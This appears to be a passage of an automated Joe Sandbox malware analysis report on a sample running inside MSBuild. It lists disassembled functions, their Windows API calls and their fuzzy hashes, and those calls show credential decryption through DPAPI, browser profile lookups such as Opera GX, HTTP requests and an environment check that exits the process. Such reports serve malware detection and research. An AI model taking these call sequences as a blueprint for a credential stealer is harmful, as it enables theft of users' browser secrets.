                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                                                            • String ID: $DPAPI
                                                                                                                                                                                                                                                                            • API String ID: 512175977-1819349886
                                                                                                                                                                                                                                                                            • Opcode ID: e57edee3f3d7b817aeb0e109a879f4908534b96d8f8cc706ab0346b101acb06e
                                                                                                                                                                                                                                                                            • Instruction ID: 756776268f3a410f8ea97ed2d03368a249db7ca66dc35e5b071a325b4266dc37
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e57edee3f3d7b817aeb0e109a879f4908534b96d8f8cc706ab0346b101acb06e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D431B4B1D00109ABDB10DB95DC42BEFB77AEB44314F14462AF905B32D1E738A90587E6
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0040E2F0 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 485COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX,00426AD3,00426AD2,?,?), ref: 0040E34D
                                                                                                                                                                                                                                                                              • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00411610: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                                              • Part of subcall function 0040CDE0: StrStrA.SHLWAPI(00000000,00E38BE0,?,?,?,?,?,?,?,?,?,?,?,00421750,?), ref: 0040CE4B
                                                                                                                                                                                                                                                                              • Part of subcall function 0040CDE0: memcmp.MSVCRT ref: 0040CE89
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                                                                                            • String ID: $$Opera GX
                                                                                                                                                                                                                                                                            • API String ID: 1439182418-3699434461
                                                                                                                                                                                                                                                                            • Opcode ID: fd309a3b40900918eb7f523b4228bde185d93eea0c4cc0c3a7b4a9c3baf3580c
                                                                                                                                                                                                                                                                            • Instruction ID: 80cc4b7ed22ef5f98a5cc857f1ea2cbded4609870464dcecd3af56b3405bc9c8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd309a3b40900918eb7f523b4228bde185d93eea0c4cc0c3a7b4a9c3baf3580c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68128070901248EACB14EBE5D945ADDBBB9AF19304F14817EE905732D2DB782B0CC7A6
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0040ECC9 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39810), ref: 0040ECE0
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39820), ref: 0040EDE3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 0040E2F0: StrCmpCA.SHLWAPI(00000000,Opera GX,00426AD3,00426AD2,?,?), ref: 0040E34D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                                                                                                                            • String ID: Stable\
                                                                                                                                                                                                                                                                            • API String ID: 3722407311-272486606
                                                                                                                                                                                                                                                                            • Opcode ID: da73e72bf46c9c8938a123d0de55fbd3436eada3c5d5d954846008cbdd8a4f45
                                                                                                                                                                                                                                                                            • Instruction ID: 269e7effacccc3b88f2b0db5f774b9eadeb94123610fb6cb7fcf78a80ad87f18
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da73e72bf46c9c8938a123d0de55fbd3436eada3c5d5d954846008cbdd8a4f45
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8CB13774900248DFCB24DFA9C581ADEBBF5BF48304F10856EE946A3791D774AA08CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00413E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00413E40
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F0F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                                                                                                                                            • String ID: ERROR
                                                                                                                                                                                                                                                                            • API String ID: 1659193697-2861137601
                                                                                                                                                                                                                                                                            • Opcode ID: 875d17d054caf0032805d24f7412f369e5d2c0d1644f1f1309d22229dc259743
                                                                                                                                                                                                                                                                            • Instruction ID: d06a122d75f069d58e7f74fa6f005182342bd9d38848a2deb67c20992f7cfd55
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 875d17d054caf0032805d24f7412f369e5d2c0d1644f1f1309d22229dc259743
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4141B7B1D00248AFCB00EFB9D946BDD7B74EB09744F10816EF51567281DB389648C7E5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00413A40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AF8
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000004), ref: 00405B10
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B34
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: HttpOpenRequestA.WININET(00000000,GET,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 00405B6B
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B8F
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413AB5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$Open$ConnectHttpOptionRequestlstrcpy
                                                                                                                                                                                                                                                                            • String ID: ERROR$ERROR
                                                                                                                                                                                                                                                                            • API String ID: 1815705353-2579291623
                                                                                                                                                                                                                                                                            • Opcode ID: 29369b383e77385b3c5e2df5f409f7e149f79e40e97b6244fb7927c41833eb8e
                                                                                                                                                                                                                                                                            • Instruction ID: ea8fe1bea799831a1bfffcb10daa165b53663d9ec20256ad752a871f992b9cff
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29369b383e77385b3c5e2df5f409f7e149f79e40e97b6244fb7927c41833eb8e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08315274904248DADB10EBA5C5067DD7BB8AF15308F5041AEE905636D3DBBC2B08CBE6
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAB3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CAB3095
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CB3F688,00001000), ref: 6CAB35D5
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CAB35E0
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CAB35FD
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CAB363F
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CAB369F
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB35A0: __aulldiv.LIBCMT ref: 6CAB36E4
                                                                                                                                                                                                                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CAB309F
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CAD56EE,?,00000001), ref: 6CAD5B85
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5B50: EnterCriticalSection.KERNEL32(6CB3F688,?,?,?,6CAD56EE,?,00000001), ref: 6CAD5B90
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5B50: LeaveCriticalSection.KERNEL32(6CB3F688,?,?,?,6CAD56EE,?,00000001), ref: 6CAD5BD8
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5B50: GetTickCount64.KERNEL32 ref: 6CAD5BE4
                                                                                                                                                                                                                                                                            • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CAB30BE
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CAB3127
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB30F0: __aulldiv.LIBCMT ref: 6CAB3140
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEAB2A: __onexit.LIBCMT ref: 6CAEAB30
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4291168024-0
                                                                                                                                                                                                                                                                            • Opcode ID: 872987d516bc8613231770917a9efbcef68c1002fb11077353e64d4a45311912
                                                                                                                                                                                                                                                                            • Instruction ID: fa63d9e91f973e4223986257b32123bf24cd50857c1e94bb3dea7b2cb972a0cb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 872987d516bc8613231770917a9efbcef68c1002fb11077353e64d4a45311912
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77F0D612E20B8497CA20DF748A411AE7374AF6B114B10231AE88C63521FB3065DCC3D1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 004119C0 Relevance: 4.5, APIs: 3, Instructions: 31COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004119DC
                                                                                                                                                                                                                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004119F7
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004119FE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                            • Opcode ID: bcc58d43892302e84752d8720c11c2692e214fff34667dd5a0482a2640b4e2d4
                                                                                                                                                                                                                                                                            • Instruction ID: ac0064d5e055494f77bdf6553da814fcfcb78952508ca86c52a6e4941c22f22a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bcc58d43892302e84752d8720c11c2692e214fff34667dd5a0482a2640b4e2d4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4F02735A0523867E720AB84DC05FDE77289F05710F000094FF84AB2D0DBB05E8487D4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00410260 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,00E2E4A0,004184AF), ref: 0041026C
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,00E2E4A0,004184AF), ref: 00410273
                                                                                                                                                                                                                                                                            • GetComputerNameA.KERNEL32(00000000,004184AF), ref: 00410287
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4203777966-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7bce67f87bdb96f85597cc7a337a5ba78b465bb225b0d0b4e914754af934b001
                                                                                                                                                                                                                                                                            • Instruction ID: 4b37c6b9c783d41ef7fb4556bea2f0c7907c2bd1f90e8b131d8aee123ed8a75f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bce67f87bdb96f85597cc7a337a5ba78b465bb225b0d0b4e914754af934b001
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06E08CB5640228ABE3009BD8AC0EBDB7BADDB0AB51F000192BB05D3240E6F48D0047E4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00401050 Relevance: 4.5, APIs: 3, Instructions: 19stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00410260: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,00E2E4A0,004184AF), ref: 0041026C
                                                                                                                                                                                                                                                                              • Part of subcall function 00410260: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,00E2E4A0,004184AF), ref: 00410273
                                                                                                                                                                                                                                                                              • Part of subcall function 00410260: GetComputerNameA.KERNEL32(00000000,004184AF), ref: 00410287
                                                                                                                                                                                                                                                                            • strcmp.MSVCRT ref: 0040105C
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: GetProcessHeap.KERNEL32(00000000,00000104,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: HeapAlloc.KERNEL32(00000000,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: GetUserNameA.ADVAPI32(00000000,00E2E4B0), ref: 00410247
                                                                                                                                                                                                                                                                            • strcmp.MSVCRT ref: 00401075
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00401082
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$Process$AllocNamestrcmp$ComputerExitUser
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2098570390-0
                                                                                                                                                                                                                                                                            • Opcode ID: c087e7d871184e6450b3b76f68df29489e174e0935f95b3891491568ebb2438e
                                                                                                                                                                                                                                                                            • Instruction ID: 26cb4187d2c4df1171f7cb5428b4e0e717764192679f396c01235be0c1ba569e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c087e7d871184e6450b3b76f68df29489e174e0935f95b3891491568ebb2438e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97D05BB2D0060156CF1077B25C59E5B316D5A24309B00143FFC40D3151E63DFCD4827D
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00406A20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000040,vk@,?,?,?,?,00406B76,?,?,?,?,00000000), ref: 00406A95
